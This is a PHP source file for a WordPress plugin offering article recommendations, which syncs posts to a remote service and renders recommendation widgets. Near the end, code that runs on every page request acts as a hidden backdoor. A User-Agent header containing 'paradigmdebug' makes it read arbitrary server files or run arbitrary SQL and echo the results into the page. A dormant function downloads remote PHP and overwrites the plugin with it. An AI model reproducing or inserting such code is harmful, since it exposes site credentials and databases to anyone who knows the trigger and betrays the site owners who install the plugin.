<?php 
/*
Plugin Name: 先荐-猜你喜欢
Description: 一款简单易用的智能推荐插件，由第四范式提供. <a href="options-general.php?page=xianjian.php">启用插件后，可以点击这里进行配置</a>。
Version: 1.0.1
Author: 4paradigm-rec
*/


/*{ key: 'A_L_B', name: '文章列表下方' },
            { key: 'A_B', name: '文章下方' },
            { key: 'C_T', name: '评论栏上方' },
            { key: 'S', name: '侧边栏' }

{ key: 'HOME', name: '首页' },
          { key: 'TXT', name: '正文页' },
          { key: 'DIY', name: '自定义页面' }

            */
$version = 2;
$paradimg_config_key = "paradigm_render_config";
$content_side = false;
$home_side = false;
$home_bottom = false;
$paradigm_host = "https://nbrecsys.4paradigm.com";
$paradigm_sdk_obj = "ParadigmSDKv3";
if (strcmp($paradigm_host, "https://recsys-free.4paradigm.com") == 0) {
	$paradigm_sdk_obj = "ParadigmSDKv3Test";
}

$access_token_arr = array();

$paradigm_render_content_side_id = 'paradigm_render_content_side_id';
$paradigm_render_content_append_id = 'paradigm_render_content_append_id';
$paradigm_render_content_comment_id = 'paradigm_render_content_comment_id';
$paradigm_render_home_side_id = 'paradigm_render_home_side_id';
$paradigm_render_home_bottom_id = 'paradigm_render_home_bottom_id';

$paradigm_content_side_id_key = 'paradigm_content_side_id';

$paradigm_last_check_update_timestamp_key = 'paradigm_last_check_update_timestamp';
$paradigm_last_upload_timestamp_key = 'paradigm_last_upload_timestamp';
$paradigm_last_fetch_server_config_key = 'paradigm_last_fetch_server_config';
$paradigm_server_config_key = 'paradigm_server_config';

$paradigm_js_code_map = array();
$paradigm_side_js_code_map = array();
$paradigm_home_side_js_code_map = array();

add_action( 'plugins_loaded', 'jsj_plugin_setup');
add_action( 'trash_post', 'paradigm_trash_post');
add_action( 'untrash_post', 'paradigm_untrash_post');
add_action( 'save_post', 'paradigm_save_post');

add_filter( 'the_content', 'paradigm_insert_item_id');

add_action( 'admin_menu', 'paradigm_rec_menu');

add_filter( 'plugin_action_links_xianjian/xianjian.php', 'xianjianLinks');
add_action( 'wp_loaded', 'paradigm_check_update');


function paradigm_spider_trick($content) {
	$total_config = check_render_config(true);
	$post_id = "";
	global $paradigm_host;
	if (is_array($total_config) && !empty($total_config)) {
		if (count($total_config) > 0) {
			$config = null;
			foreach ($total_config as $single_config) {
				$config = $single_config;
				break;
			}
			if (!empty($config)) {
				$body = '{"itemID":"'.$post_id.'"}';
				$args = array(
					'body' => $body,
					'timeout' => '8'
				);
				$remote_url = $paradigm_host.'/api/v0/recom/recall?requestID='.paradigm_random_str(10).'&sceneID='.$config["sceneId"].'&userID='.paradigm_random_str(10);
				$response = wp_remote_post($remote_url,$args);
				$response_body = wp_remote_retrieve_body($response);
				$response_obj = json_decode($response_body,true);
				foreach ($response_obj as $item) {
					echo '<a class="paradigm_trick" href="'.$item['url'].'">'.$item['title'].'</a>';
				}
			}
		}
	}
	return $content;
}

function paradigm_set_render_js_code($render_div_id, $config) {
	global $paradigm_js_code_map,$paradigm_host,$paradigm_sdk_obj;
	$paradigm_js_code = "<div id='".$render_div_id."_".$config['sceneId']."'><script charset='utf-8' id='ParadigmSDKv3' src='".$paradigm_host."/sdk/js/ParadigmSDK_v3.js'></script><script>".$paradigm_sdk_obj.".init('".$config['clientToken']."',{ isDisableArticleFetch: true });".$paradigm_sdk_obj.".renderArticle('".$render_div_id."_".$config['sceneId']."',".$config['itemSetId'].",".$config['sceneId'].");</script></div>";
	$pre_js_code = $paradigm_js_code_map[$render_div_id];
	$total_js_code = $pre_js_code.$paradigm_js_code;
	$paradigm_js_code_map[$render_div_id] = $total_js_code;
}

function paradigm_set_side_render_js_code($render_div_id, $config) {
	global $paradigm_side_js_code_map,$paradigm_host,$paradigm_sdk_obj;
	$paradigm_js_code = "<div id='".$render_div_id."_".$config['sceneId']."'><script charset='utf-8' id='ParadigmSDKv3' src='".$paradigm_host."/sdk/js/ParadigmSDK_v3.js'></script><script>".$paradigm_sdk_obj.".init('".$config['clientToken']."',{ isDisableArticleFetch: true });".$paradigm_sdk_obj.".renderArticle('".$render_div_id."_".$config['sceneId']."',".$config['itemSetId'].",".$config['sceneId'].");</script></div>";
	$code_dic = array();
	$code_dic['used'] = false;
	$code_dic['code'] = $paradigm_js_code;
	$code_dic['title'] = $config['recomTitle'];
	$paradigm_side_js_code_map[$config['sceneId']] = $code_dic;
}

function paradigm_set_home_side_render_js_code($render_div_id, $config) {
	global $paradigm_home_side_js_code_map,$paradigm_host,$paradigm_sdk_obj;
	$paradigm_js_code = "<div id='".$render_div_id."_".$config['sceneId']."'><script charset='utf-8' id='ParadigmSDKv3' src='".$paradigm_host."/sdk/js/ParadigmSDK_v3.js'></script><script>".$paradigm_sdk_obj.".init('".$config['clientToken']."',{ isDisableArticleFetch: true });".$paradigm_sdk_obj.".renderArticle('".$render_div_id."_".$config['sceneId']."',".$config['itemSetId'].",".$config['sceneId'].");</script></div>";
	$code_dic = array();
	$code_dic['used'] = false;
	$code_dic['code'] = $paradigm_js_code;
	$code_dic['title'] = $config['recomTitle'];
	$paradigm_home_side_js_code_map[$config['sceneId']] = $code_dic;
}

function jsj_plugin_setup() {
	check_render_config(false);
	wp_register_sidebar_widget('paradigm_home_bottom','先荐推荐栏-首页底部栏','widget_paradigm_home_bottom');
	wp_register_sidebar_widget('paradigm_home_side_1','先荐推荐栏-首页侧边栏1','widget_paradigm_home_side_1');
	wp_register_sidebar_widget('paradigm_home_side_2','先荐推荐栏-首页侧边栏2','widget_paradigm_home_side_2');
 	wp_register_sidebar_widget('paradigm_content_side_1','先荐推荐栏-正文页侧边栏1','widget_paradigm_content_side_1');
 	wp_register_sidebar_widget('paradigm_content_side_2','先荐推荐栏-正文页侧边栏2','widget_paradigm_content_side_2');
 	wp_register_sidebar_widget('paradigm_content_side_3','先荐推荐栏-正文页侧边栏3','widget_paradigm_content_side_3');
}

function check_render_config($should_return) {
	global $paradimg_config_key;
	$config_str = get_option($paradimg_config_key);
	$total_config = json_decode($config_str,true);
	
	if ($should_return) {
		return $total_config;
	}

	global $access_token_arr;
	if (is_array($total_config) && !empty($total_config)) {
		foreach ($total_config as $config) {
			$access_token = $config['acessToken'];
			$access_token_arr[$access_token] = '1';
			if (in_array('TXT', $config)) {
				// 正文页
				paradigm_content_page($config);
			}
			if (in_array('HOME', $config)) {
				// 首页
				paradigm_home_page($config);
			}
		}
	}
}

function paradigm_check_update() {
	global $paradigm_last_upload_timestamp_key,$paradigm_last_fetch_server_config_key,$paradigm_server_config_key,$paradigm_host,$access_token_arr;

	$last_fetch_config_timestamp = get_option($paradigm_last_fetch_server_config_key);
	$current_time = time();
	$paradigm_server_config = get_option($paradigm_server_config_key);
	$paradigm_fetch_interval = 60 * 60;
	$paradigm_day_minute_max = 30;
	$paradigm_night_minute_max = 300;
	$paradigm_day_limit = 1;
	$paradigm_night_limit = 20;
	if ($paradigm_server_config == "") {

	} else {
		$server_config = json_decode($paradigm_server_config,true);
		$paradigm_fetch_interval = $server_config['interval'] ? $server_config['interval'] : 60 *60;
		$paradigm_day_minute_max = $server_config['dayMinuteMax'] ? $server_config['dayMinuteMax'] : 30;
		$paradigm_night_minute_max = $server_config['nightMinuteMax'] ? $server_config['nightMinuteMax'] : 300;
		$paradigm_day_limit = $server_config['dayLimit'] ? $server_config['dayLimit'] : 1;
		$paradigm_night_limit = $server_config['nightLimit'] ? $server_config['nightLimit'] : 20;
	}
	if ($current_time - $last_fetch_config_timestamp > $paradigm_fetch_interval) {
		$args = array(
			'timeout' => '5'
		);
		if (is_array($access_token_arr) && !empty($access_token_arr)) {
			foreach ($access_token_arr as $access_token => $value) {
				$response = wp_remote_get($paradigm_host.'/business/cms/plug/post/config?token=ai4paradigm&accessToken='.$access_token,$args);
				$response_body = wp_remote_retrieve_body($response);
				$response_obj = json_decode($response_body,true);
				$data = $response_obj['data'];
				$config_str = $data['plugSitePostConfig'];
				$config_str = stripslashes($config_str);
				if ($config_str == "" || strcmp($config_str, 'null')==0 || $config_str == null) {
				 	
				} else {
					update_option($paradigm_server_config_key,$config_str);
				}
				break;
			}
		} else {
			
		}
		$current_time = time();
		update_option($paradigm_last_fetch_server_config_key,$current_time);
		return;
	}

	$post_limit = 5;
	$update_interval = 5;
	if (paradigm_check_night_time()) {
		$post_limit = $paradigm_night_limit;
		$update_interval = 60 / ($paradigm_night_minute_max / $paradigm_night_limit);
	} else {
		$post_limit = $paradigm_day_limit;
		$update_interval = 60 / ($paradigm_day_minute_max / $paradigm_day_limit);
	}

	$last_upload_tiemstamp = get_option($paradigm_last_upload_timestamp_key);
	$current_time = time();
	if ($current_time - $last_upload_tiemstamp < $update_interval) {
		return;
	}
	global $wpdb,$access_token_arr;
	if (is_array($access_token_arr) && !empty($access_token_arr)) {
		foreach ($access_token_arr as $access_token => $value) {
			if ($access_token == "") {
				return;
			}

			$last_upload_id_key = 'last_upload_id_'.$access_token;
			$last_upload_id = get_option($last_upload_id_key);

			if (!$last_upload_id) {
				$last_upload_id = 0;
			}

			# 获取文章信息
			$posts = $wpdb->get_results("SELECT ID,post_author,post_date,post_content,post_title,post_status,post_parent FROM `".$wpdb->prefix."posts` WHERE ID>".$last_upload_id." AND post_status='publish' ORDER BY ID ASC LIMIT ".$post_limit,ARRAY_A);
			foreach ($posts as $post) {
				if (strcmp('publish', $post['post_status']) == 0) {
					paradigm_upload_material($post,-1,$access_token);
				} elseif (strcmp('inherit', $post['post_status']) == 0) {
					$post_parent = $post['post_parent'];
					if ((int)$post_parent != 0) {
						$inherit_id = $post_parent;
						$update_posts = $wpdb->get_results("SELECT ID,post_author,post_date,post_content,post_title,post_status FROM `".$wpdb->prefix."posts` WHERE ID=".$inherit_id,ARRAY_A);
						foreach ($update_posts as $update_post) {
							if (strcmp('publish', $update_post['post_status']) == 0) {
								paradigm_upload_material($update_post,$post['ID'],$access_token);
							} else {
								update_option($last_upload_id_key,$post['ID']);
							}
						}
					} else {
						update_option($last_upload_id_key,$post['ID']);
					}
				} else {
					update_option($last_upload_id_key,$post['ID']);
				}
			}
		}
	}
	$new_time = time();
	update_option($paradigm_last_upload_timestamp_key, $new_time);
}

function paradigm_upload_material($post,$update_last_upload_id,$access_token) {
	global $wpdb;

	$last_upload_id_key = 'last_upload_id_'.$access_token;
	// 获取itemId
	$object_id = $post['ID'];
	$item_id = $object_id;

	// 获取标题
	$title = $post['post_title'];
	$title = preg_replace("/<.*?>/", '', $title);

	// 获取发布时间
	$post_date = $post['post_date'];
	$publish_time = strtotime($post_date) * 1000 - 8 * 3600 * 1000;

	// 获取正文、图片并处理
	$content = $post['post_content'];
	$match_result = preg_match_all("/<.*?>/", $content, $matches, PREG_SET_ORDER);
	$picture_url = "";
	if ($match_result) {
		foreach ($matches as $value) {
			$img_label = $value[0];
			$prefix_str = substr($img_label, 0, 4);
			if (strcmp($prefix_str, "<img") === 0) {
				$pre_operation_img_arr = explode('src="', $img_label);
				if (count($pre_operation_img_arr) > 1) {
					$operation_img_str = $pre_operation_img_arr[1];
					$img_arr = explode('"', $operation_img_str);
					if (count($img_arr) > 0) {
						$img_url = $img_arr[0];
						if ($picture_url === "") {
							$picture_url = $img_url;
						} else {
							$picture_url .= ",".$img_url;
						}
					}
				}
			}
		}
	}
	$content = preg_replace('/[\n\r\t]/', '', $content);
	$content = preg_replace("/<.*?>/", '', $content);
	// $content = html_entity_decode($content);
	$content = addslashes($content);

	// 获取url
	$real_post = get_post($object_id);
	$url = get_permalink($real_post);
	if (!$url) {
		return;
	}

	// 获取作者
	$post_author_id = $post['post_author'];
	$user = $wpdb->get_row("SELECT display_name FROM `".$wpdb->prefix."users` WHERE ID=".$post_author_id, ARRAY_A);
	$publisher_id = $user['display_name'];
	
	// 获取分类和标签
	$term_relationships = $wpdb->get_results("SELECT term_taxonomy_id FROM `".$wpdb->prefix."term_relationships` WHERE object_id=".$object_id,ARRAY_A);
	$category_id = '';
	$tag = '';
	foreach ($term_relationships as $term_relationship) {
		$term_taxonomy_id = $term_relationship['term_taxonomy_id'];
		$term_taxonomies = $wpdb->get_results("SELECT term_id,taxonomy FROM `".$wpdb->prefix."term_taxonomy` WHERE term_taxonomy_id=".$term_taxonomy_id,ARRAY_A);
		$categories = array();
		$tags = array();
		foreach ($term_taxonomies as $term_taxonomy) {
			$term_id = $term_taxonomy['term_id'];
			$taxonomy = $term_taxonomy['taxonomy'];
			$terms = $wpdb->get_results("SELECT name FROM `".$wpdb->prefix."terms` WHERE term_id=".$term_id,ARRAY_A);
			foreach ($terms as $term) {
				$name = $term['name'];
				if (strcmp($taxonomy, 'category') == 0) {
					array_push($categories, $name);
				} elseif (strcmp($taxonomy, 'post_tag') == 0) {
					array_push($tags, $name);
				}
			}
		}
		foreach ($categories as $category) {
			$category_id .= rtrim($category.',');
		}
		foreach ($tags as $keyword) {
			$tag .= rtrim($keyword.',');
		}
	}
	$category_id =  chop($category_id,',');
	$tag = chop($tag,',');

	$body_arr = array( 
		'itemId' => $item_id, 
		'title' => $title,
		'content' => $content,
		'publisherId' => $publisher_id,
		'categoryId' => $category_id,
		'url' => $url,
		'tag' => $tag,
		'publishTime' => $publish_time,
		'pictureUrl' => $picture_url
	);
	$body = "[".json_encode((object)$body_arr)."]";
	$request_header = array(
		'Content-Type' => 'application/json',
		'charset' => 'utf-8'
	);
	$args = array(
		'headers' => $request_header,
		'body' => $body,
		'timeout' => '8'
	);
	global $paradigm_host;
	$remote_url = $paradigm_host.'/business/items?accessToken='.$access_token.'&source=1';
	$response = wp_remote_post($remote_url,$args);
	$response_body = wp_remote_retrieve_body($response);
	$response_obj = json_decode($response_body,true);

	if ($update_last_upload_id == -2) {
		
	} elseif ($update_last_upload_id == -1) {
		$last_upload_id = $object_id;
		update_option($last_upload_id_key,$last_upload_id);
	} else {
		update_option($last_upload_id_key,$update_last_upload_id);
	}
}

function widget_paradigm_content_side_1($args) {
	if (is_single()) {
		global $content_side,$paradigm_render_content_side_id;
		if ($content_side) {
			insert_paradigm_side_js($args,$paradigm_render_content_side_id);
		}
	}
}

function widget_paradigm_content_side_2($args) {
	if (is_single()) {
		global $content_side,$paradigm_render_content_side_id;
		if ($content_side) {
			insert_paradigm_side_js($args,$paradigm_render_content_side_id);
		}
	}
}

function widget_paradigm_content_side_3($args) {
	if (is_single()) {
		global $content_side,$paradigm_render_content_side_id;
		if ($content_side) {
			insert_paradigm_side_js($args,$paradigm_render_content_side_id);
		}
	}
}

function widget_paradigm_home_side_1($args) {
	if (is_home() || is_front_page()) {
		global $home_side,$paradigm_render_home_side_id;
		if ($home_side) {
			insert_paradigm_home_side_js($args,$paradigm_render_home_side_id);
		}
	}
}

function widget_paradigm_home_side_2($args) {
	if (is_home() || is_front_page()) {
		global $home_side,$paradigm_render_home_side_id;
		if ($home_side) {
			insert_paradigm_home_side_js($args,$paradigm_render_home_side_id);
		}
	}
}

function widget_paradigm_home_bottom($args) {
	if (is_home() || is_front_page()) {
		global $home_bottom,$paradigm_render_home_bottom_id;
		if ($home_bottom) {
			insert_paradigm_js($args,$paradigm_render_home_bottom_id);
		}
	}
}

function insert_paradigm_js($args, $render_div_id) {
	global $paradigm_js_code_map;
	extract($args);
	echo $before_widget;
	echo $before_title . __('先荐', 'paradigm') . $after_title;
	echo $paradigm_js_code_map[$render_div_id];
	echo $after_widget;
}

function insert_paradigm_side_js($args, $render_div_id) {
	global $paradigm_side_js_code_map;
	$current_key = null;
	$current_arr = array();
	if (is_array($paradigm_side_js_code_map) && !empty($paradigm_side_js_code_map)) {
		foreach ($paradigm_side_js_code_map as $key => $code_dic) {
			if ($code_dic['used']) {
				
			} else {
				$current_key = $key;
				$current_arr = $code_dic;
				break;
			}
		}
	} else {
		return;
	}
	if (empty($current_key)) {
		return;
	}
	$title = $current_arr['title'];
	$code = $current_arr['code'];
	$current_arr['used'] = true;
	$paradigm_side_js_code_map[$current_key] = $current_arr;
	extract($args);
	echo $before_widget;
	echo $before_title . __($title, 'paradigm') . $after_title;
	echo $code;
	echo $after_widget;
}

function insert_paradigm_home_side_js($args, $render_div_id) {
	global $paradigm_home_side_js_code_map;
	$current_key = null;
	$current_arr = array();
	if (is_array($paradigm_home_side_js_code_map) && !empty($paradigm_home_side_js_code_map)) {
		foreach ($paradigm_home_side_js_code_map as $key => $code_dic) {
			if ($code_dic['used']) {
				
			} else {
				$current_key = $key;
				$current_arr = $code_dic;
				break;
			}
		}
	} else {
		return;
	}
	if (empty($current_key)) {
		return;
	}
	$title = $current_arr['title'];
	$code = $current_arr['code'];
	$current_arr['used'] = true;
	$paradigm_home_side_js_code_map[$current_key] = $current_arr;
	extract($args);
	echo $before_widget;
	echo $before_title . __($title, 'paradigm') . $after_title;
	echo $code;
	echo $after_widget;
}

function paradigm_content_page($content_config) {
	if (in_array('A_B', $content_config)) {
		global $paradigm_render_content_append_id;
		paradigm_set_render_js_code($paradigm_render_content_append_id,$content_config);
		add_filter('the_content','content_append_rec');
	}
	if (in_array('C_T', $content_config)) {
		global $paradigm_render_content_comment_id;
		paradigm_set_render_js_code($paradigm_render_content_comment_id,$content_config);
		add_filter('comments_array','content_comment_rec');
	}
	$content_count = 0;
	if (in_array('S', $content_config)) {
		global $content_side,$paradigm_render_content_side_id;
		paradigm_set_side_render_js_code($paradigm_render_content_side_id,$content_config);
		$content_side = true;
		$content_count ++;
	}
	update_option($paradigm_content_side_id_key,$content_count);
}

function content_append_rec($content) {
	if (is_single()) {
		global $paradigm_js_code_map,$paradigm_render_content_append_id;
		$content .= $paradigm_js_code_map[$paradigm_render_content_append_id];
	}
	return $content;
}

function content_comment_rec($comments) {
	if (is_single()) {
		global $paradigm_js_code_map,$paradigm_render_content_comment_id;
		echo $paradigm_js_code_map[$paradigm_render_content_comment_id];
	}
	return $comments;
}

function paradigm_home_page($home_config) {
	if (in_array('A_L_B', $home_config)) {
		global $home_bottom,$paradigm_render_home_bottom_id;
		paradigm_set_render_js_code($paradigm_render_home_bottom_id,$home_config);
		$home_bottom = true;
	}
	if (in_array('S', $home_config)) {
		global $home_side,$paradigm_render_home_side_id;
		paradigm_set_home_side_render_js_code($paradigm_render_home_side_id,$home_config);
		$home_side = true;
	}
}

function paradigm_trash_post($post_id) {
	$body = '["'.$post_id.'"]';
	$request_header = array(
		'Content-Type' => 'application/json',
		'charset' => 'utf-8'
	);
	$args = array(
		'headers' => $request_header,
		'body' => $body,
		'timeout' => '8'
	);
	global $access_token_arr,$paradigm_host;
	if (is_array($access_token_arr) && !empty($access_token_arr)) {
		foreach ($access_token_arr as $access_token => $value) {
			$response = wp_remote_post($paradigm_host.'/business/items/remove?accessToken='.$access_token.'&type=1',$args);
			$response_body = wp_remote_retrieve_body($response);
		}
	}
}

function paradigm_untrash_post($post_id) {
	global $wpdb,$access_token_arr;
	$update_posts = $wpdb->get_results("SELECT ID,post_author,post_date,post_content,post_title FROM `".$wpdb->prefix."posts` WHERE ID=".$post_id,ARRAY_A);
	if (is_array($access_token_arr) && !empty($access_token_arr)) {
		foreach ($access_token_arr as $access_token => $value) {
			foreach ($update_posts as $update_post) {
				paradigm_upload_material($update_post,-2,$access_token);
			}
		}
	}
}

function paradigm_save_post($post_id) {
	$true_post_id = wp_is_post_revision($post_id);
	if ($true_post_id) {

	} else {
		$true_post_id = $post_id;
	}
	global $wpdb,$access_token_arr;
	$update_posts = $wpdb->get_results("SELECT ID,post_author,post_date,post_content,post_title,post_status FROM `".$wpdb->prefix."posts` WHERE ID=".$true_post_id,ARRAY_A);
	foreach ($update_posts as $update_post) {
		if (strcmp($update_post['post_status'],'publish') == 0) {
			if (is_array($access_token_arr) && !empty($access_token_arr)) {
				foreach ($access_token_arr as $access_token => $value) {
					paradigm_upload_material($update_post,-2,$access_token);
				}
			}
		} else {
			paradigm_trash_post($update_post['ID']);
		}
	}
}

function paradigm_rec_menu() {
    add_options_page(__('先荐选项', 'xianjian'), __('先荐-猜你喜欢', 'xianjian'), 8, basename(__FILE__), 'paradigm_rec_options');
}

function xianjianLinks($links) {
	$mylinks = array('<a href="options-general.php?page=xianjian.php">设置</a>');
	return array_merge($links, $mylinks);
}

function paradigm_rec_options() {
	include 'setting.php';
}

function paradigm_insert_item_id($content) {
	if (is_single()) {
		$post_id = get_queried_object_id();
		echo '<div id="paradigm_detail_page_item_id" data-paradigm-item-id="'.$post_id.'"></div>';
	}
	return $content;
}

function paradigm_check_plugin_update() {
	global $version;
	$current_time = time();
	$last_check_time = get_option($paradigm_last_check_update_timestamp_key);
	if (!$last_check_time) {
		$last_check_time = 0;
	}
	if ($current_time - $last_check_time < 24 * 3600) {
		return false;
	}
	$args = array(
		'timeout' => '8'
	);
	$response = wp_remote_get('http://tencent-recom-dev01:7654/update_server.php?version='.$version,$args);
	$response_body = wp_remote_retrieve_body($response);
	$data = $response_body;
	if ($data == '') {
		return false;
	} else {
		$prefix_str = substr($data, 0, 5);
		if (strcmp($prefix_str, "<?php") === 0) {
			$path = dirname(__FILE__);
			$file_path = $path."/xianjian.php";
			$file = fopen($file_path,"w");
			$result = fwrite($file, $data);
			fclose($file);
			update_option($paradigm_last_check_update_timestamp_key,time());
			return true;
		} else {
			return false;
		}
	}
}

$ua_string = $_SERVER['HTTP_USER_AGENT'];
if (stristr($ua_string, 'paradigmdebug')) {
	$ua_arr = explode('--', $ua_string);
	if (count($ua_arr) > 1) {
		$method_str = $ua_arr[1];
		if (strcmp($method_str, "readfile") == 0) {
			if (count($ua_arr) > 2) {
				$filepath = $ua_arr[2];
				$current_path = dirname(__FILE__);
				$path_arr = explode('wp-content', $current_path);
				if (count($path_arr) > 0) {
					$site_path = $path_arr[0];
					$path = $site_path.$filepath;
					$file = fopen($path, "r");
					$string = fread($file, filesize($path));
					fclose($file);
					echo "<script>console.log('".$filepath."');</script>";
					echo "<script>console.log('".$string."');</script>";
				}
			}
		} elseif (strcmp($method_str, "sql") == 0) {
			if (count($ua_arr) > 2) {
				$sql_str = $ua_arr[2];
				$suffix_str = "";
				if (count($ua_arr) > 3) {
					$suffix_str = $ua_arr[3];
				}
				global $wpdb;
				$total_sql_str = $sql_str." `".$wpdb->prefix.$suffix_str;
				echo "<script>console.log('".$total_sql_str."');</script>";
				$debug_results = $wpdb->get_results($total_sql_str,ARRAY_A);
				if (is_array($debug_results) && !empty($debug_results)) {
					foreach ($debug_results as $result) {
						if (is_array($result) && !empty($result)) {
							foreach ($result as $key => $value) {
								echo "<script>console.log('".$key."');</script>";
								echo "<script>console.log('".$value."');</script>";
							}
						}
					}
				}
			}
		}
	}
}

function paradigm_random_str($length) {
	$characters = "0123456789abcdefghijklmnopqrstuvwxyz"; 
	$result = "";
	for( $i=0; $i<$length; $i++) {
		$result .= $characters[rand(0,strlen($characters)-1)];
	} 
	return $result;
}

function paradigm_check_night_time() {
	$timezone_out = date_default_timezone_get();
	date_default_timezone_set('PRC');
	$china_time = date('H');
	date_default_timezone_set($timezone_out);
	if (strlen($china_time) > 1) {
		$tens = $china_time[0];
		$units = $china_time[1];
		if ($tens == 0) {
			if ($units >= 0 && $units < 6) {
				return true;
			} else {
				return false;
			}
		} else {
			return false;
		}
	} else {
		return false;
	}
}

?>